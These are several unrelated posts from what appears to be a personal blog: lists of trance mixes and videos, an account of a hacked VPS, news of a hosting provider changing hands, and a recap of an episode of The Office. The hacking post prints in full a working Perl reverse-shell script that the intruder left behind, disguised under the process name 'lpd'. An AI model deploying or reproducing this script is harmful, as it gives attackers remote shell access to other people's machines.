Armin van Buuren, being the world’s best DJ contributed massively with his surprisingly hard set at Mayday 2007:

Other listen-worthy mixes from Ronski Speed, Sasha and John Digweed, Tiesto and the Thrillseekers:

Those Thrillseeker mixes are quite rare, so be sure to grab them before they fall off the internets ;)

Oh just saw, some mixes are from 2005… sorry about that, anyway- enjoy!

Looking through some bookmarks on my old machine I found this reference to Trance Videos at TranceAddict. For some reason the videos offered there are direct download are rather limited, which is why I compiled this list of Trance Videos from 2002 to 2007 below. It is made up of Trance Videos by ATB, Tiesto, Armin van Buuren, N-Trance and the alikes. Cephomba came up with a list of the best 100 Trance tracks of 2008, which inspired me to look through some old stuff and compile this list.

A beautiful and melodic track is Ravels by William Orbit, many of you may know him better because of his Adagio for Strings remixes that were also featured and remixed by Tiesto. Get this ViVa television trance video recording at

A totally different era and music style genre is that of N-Trance and their chart-breaker “Set you Free”. I dont like the crap quality at youtube, which is why I located the video below . It has nice audio and video, so for a high-quality version get the one above. In a similar fashion, Alice Deejay was producing tracks: better of alone for instance. The TMF 2000 awards mix features a variety of Alice Deejay trance songs:

Moby, starting his career sometime in the early 90s (listened to his Essential Mix on Radio 1 the other day from 1994 or so, its awesoem but you really hear all the cuts and fades) had some ear-catching themes in the charts as well, his famous tracks include Porcelain, Why does my heart feel so bad and also the soundtrack for the james bond movie (was it goldeneye?). Find below the three trance videos in high quality.

Also in the 90s, but more towards the end, Mauro Picotto, Italian DJ and Producer, became quite famous (at least in Germany) with his hard-style of trance and songs such as Iguana, Komodo (that is the one with the lizard) and back to cali. I own many of his vinyls, mostly from the label BXR, one of the harder sides of trance. Below you can get three trance videos of Mauro Picotto and one interview.

Speaking of Germany and the 90s, Members of Mayday were quite famous, too with their single “Sonic Empire”, a classic rave theme that many would mistake for trance.
I found one track, culture flash, which you may like, too.

In a similar hard fashion to Mauro Picotto, Kai Tracid (he is German I believe), rocked the dance charts with track such as “Too many times” and “Trance and Acid“, get the two Kai Tracid Videos below from rapidshare:

Now jumping a bit in time, 2003, Lasgo, with her rather cheesy Trance got major media attention and also won the 2003 TMF awards. The remix below features Sylver, Milk Inc. and Faithless: they are redoing an alltime classic, INSOMNIA. Really a nice version and the birds look fit, too.

A year later, Ferry Corsten, one of the world’s best DJs performs at the 2004 TMF awards – , his performance didn’t really blast me off the chair, but it is a nice track anyway.

At the same year, Tiesto was also performing at the TMF awards. . However this was in the Netherlands and not Belgium. Another Tiesto trance video is “Suburban Train”, a legend of a track and one of my all time favourite songs:
, the video is really well laid-out and done, love it.

Did you know that Tiesto and Ferry Corsten were producing together some time ago? They were behind “Gouryella”.
Gouryella is a Dutch trance act comprising Ferry Corsten and DJ Tiësto. The word itself means “heaven” in an aborigine language.
The heart breaking and cool techy song and trance video is available here

A similar, rather slow-ish and soft trance, vocal trance song and video is by Delerium – Innocente. It also sounds a bit like “breathing by Rank1 and dreaming by BT” – or I am mixing it up now…

Faithless’ “WE COME ONE” track was one of the first songs that they released after their (longer) break and hits like “God is a DJ” and “Insomnia” – We come one, trance video in high-quality at rapidshare:

Earlier in the post I mentioned ATB – also a German producer and DJ. I believe many of his tracks are not known outside of Europe, so if you are from “the other side”, you may want to check out

You are not alone is based on the version from Olive and a real ear-worm, be sure to grab those.

In 2005 I attended Sensation White in Amsterdam where David Guetta played “tainted love” for the first time in a dirty-trance-house-ish remix, the entire Sensation White video is available in four parts here:

Some hours later Armin van Buuren played “Shivers” live with Jan Wayne on the grand piano – an amazing performance, be sure to get the high-quality armin van buuren sensation white 2005 video:

part 1
part 2
part 3
part 4
(may need renaming, so par that is listed first will become part1.rar etc.)

Mp3-Version of the set, without video

Speaking of Armin van Buuren, he is nowadays the best DJ in the world and chucked Tiesto of his throne, below are the trance videos of Shivers by AvB and the theme song of “24″.

And Marco V’s Sensation White 2005 set:

Mp3 version of Marco V’s Sensation White set

And the famous megamix of Sensation White 2005 as high-quality mp3

More to be added later as I find them…

Armin van Buuren’s Mysteryland 2007 set (no video however, but excellent set)

Another Mysteryland set, same year (2007) by Markus Schulz:

Not trance at all, but rather oldschool is Luna-C’s track “Angel” which, some claim, is a autobiography of Luna-C.
Get the entire video of “Angel” by Luna-C here:

or the “fancy dolphin voice-over part”, here:

Last time this sort of odd situation occured was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777, read,write, execute all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only wordpress is to “blame”, such as coppermine require similar settings for full functionality.

Anyway – someone from switzerland (bless the logs) had uploaded a perl script to one of the domains and was running excessive ssh scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and with my CHMOD 777 clue dropped in, some rootkit scans and other audits they were able to chuck out those unwanted visitors and files within an hour.

This is frankly speaking a support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at solarvps, else I wonder how they were able to almost instantianiously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?

Below you find one of the scripts that was used to call home and cause havoc, I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:

c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Solar VPS - Green hosting

Today I have received an email from Sean at zone.net stating that effective from four months now onwards all VPS (Virtual Private Server) business will be transfered to SolarVPS.

Sean speaks very highly of SolarVPS’ CEO and managing director and excuses for the “crap” level of support that zone.net customers had to endure in the past few months.

The official press release can be found on Solar VPS’ news section. Being transparent about communication is one of the major pillars of decent business – “I like”.

Some famous highlights include the multi-day downtime due to some failure and a for-ages taking check-disk (from 11:48 AM EST(11/7/2008) to 7:19 PM EST (11/9/2008), where as it would be more like 9am to 8pm, frankly)

Also some minor, less exciting downtimes of twelve to twenty hours recently can be recalled by some of you.

My phone-calls to the 001 yank-hotline have been answered but greeted with massive unfriendliness and really low level of knowledge stating “we are aware that our sites (cough and yours) are currently unavailable”.

I am curious what the time at SolarVPS will bring – the mail sent by Sean listed an email address by which management might be contacted directly.

If SolarVPS prolong zone.net’s sponsorship agreement I would be keen to give them a ride.

In the meantime, if you have any other recommendations or comments, feel free to contact me.

Oh- and the new site is coming, I am currently just looking into a way to politely tell IE6 visitors (still 26% over the past few months) to upgrade or switch.

Having worked in a major PR company in the last six month and having experienced the (probably worst) “almost” over-sea like IT support, I see the problems with upgrading, however believe it should be able to replace a seven year old piece of software with something newer (IE7, IE8 beta, Firefox, Opera, Safari, etc).

The Office – Lecture Circurt
Some episodes earlier Michael went to NY, to corporate, to hear that his branch and management style was doing great while the other branches were not performing that well. Based there on Michael gets sent around to the other branches to explain how. He meets Karen, Jim’s ex girlfriend in one office and sees that she is pregnant. Pam who accompanies Michael is reliefed to speak with Karen and sort things out from the past. This reminds Michael to do the same with his former love, the HR lady. Meanwhile, Dwight and Jim, the new heads of the party planning committee, forget a birthday and have to deal with the fallout. After the end of his engagement, Andy falls for someone new, a client of D&M. This episode is the first part of two, so stay tuned for next week.
